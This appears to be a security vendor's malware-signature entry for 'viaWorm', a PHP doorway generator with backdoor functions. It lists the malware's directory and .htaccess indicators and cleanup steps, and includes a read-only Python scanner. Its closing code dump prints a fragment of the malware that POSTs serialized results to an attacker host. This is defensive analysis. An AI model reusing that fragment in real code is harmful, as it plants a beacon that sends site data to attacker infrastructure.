Malware Signatures

php.hacktool.viaWorm-doorway-gen.001

Hacktools are specially crafted tools used to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and brute-forcing passwords. Most of the time these tools are hidden in the filesystem and were installed along with other malicious code through a vulnerability or an already compromised server.
viaWorm is a doorway generator that also has backdoor functionality. Known versions of this script work with cssstyle.org and stylesheetcss.com. The doorway generator creates the following directory structure in one of the site's writable directories: __links_sources/__pages_sources; __links_sources/__website_config; __links_sources/__sys_source; __links_sources/__pages_map; __links_sources/__links_sources; __links_sources/__website_source. Inside those directories you can find doorway pages, templates, link maps, etc. To make the doorways publicly visible, the script makes changes to .htaccess.

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup consists of deleting the doorway generator file, cleaning the .htaccess file and deleting the __links_sources/ directory. Depending on how deep the infection goes, there might be other malicious files and open security holes.
You can also sign up with us and let our team remove the malware for you.
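
To locate the three artifacts the cleanup step refers to, the following read-only scanner is an added example, not code from this page or its vendor. The function names `scan` and `htaccess_chain`, the `.php` extension filter and the 2 MiB read limit are assumptions; the directory names, class name and hostnames are the ones quoted above.

```python
import os

# Indicators quoted from the signature description on this page.
DROP_DIR = "__links_sources"
KNOWN_SUBDIRS = {"__pages_sources", "__website_config", "__sys_source",
                 "__pages_map", "__links_sources", "__website_source"}
CODE_MARKERS = (b"class viaWorm", b"cssstyle.org", b"stylesheetcss.com")
MAX_READ = 2 * 1024 * 1024  # assumption: markers occur within the first 2 MiB


def htaccess_chain(start, webroot):
    """Yield every .htaccess from `start` up to `webroot` (Apache merges them all)."""
    current, root = os.path.abspath(start), os.path.abspath(webroot)
    while os.path.commonpath([current, root]) == root:
        candidate = os.path.join(current, ".htaccess")
        if os.path.isfile(candidate):
            yield candidate
        if current == root:
            break
        current = os.path.dirname(current)


def scan(webroot):
    """Return sorted (kind, path) findings. Nothing is modified or deleted."""
    findings = set()
    for dirpath, dirnames, filenames in os.walk(os.path.abspath(webroot)):
        # The drop directory only counts when it holds a known subdirectory.
        if os.path.basename(dirpath) == DROP_DIR and KNOWN_SUBDIRS & set(dirnames):
            findings.add(("doorway_dir", dirpath))
            # The page does not say which .htaccess is changed: review the chain.
            for ht in htaccess_chain(os.path.dirname(dirpath), webroot):
                findings.add(("htaccess_review", ht))
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_READ)
            except OSError:
                continue  # unreadable file: skipped, not treated as clean
            if any(marker in data for marker in CODE_MARKERS):
                findings.add(("generator_candidate", path))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    for kind, path in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{kind}\t{path}")
```

Findings tagged `htaccess_review` are candidates for manual comparison against a known-good copy, since the page does not describe the exact changes the script makes.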

Dump

/**
 * Class viaWorm
 */
class viaWorm
{
    const DADDY_HOST = 'cssstyle.org';
    const LINKS_DADDY_HOST = 'stylesheetcss.com';
...
        $query = http_build_query(array('worm_result' => serialize($result)));
        $worm_precess_url = 'http://' . viaWorm::DADDY_HOST . '/process-worm';
        viaWorm::sendPost($worm_precess_url, $query);
        echo json_encode($result);
        exit();
}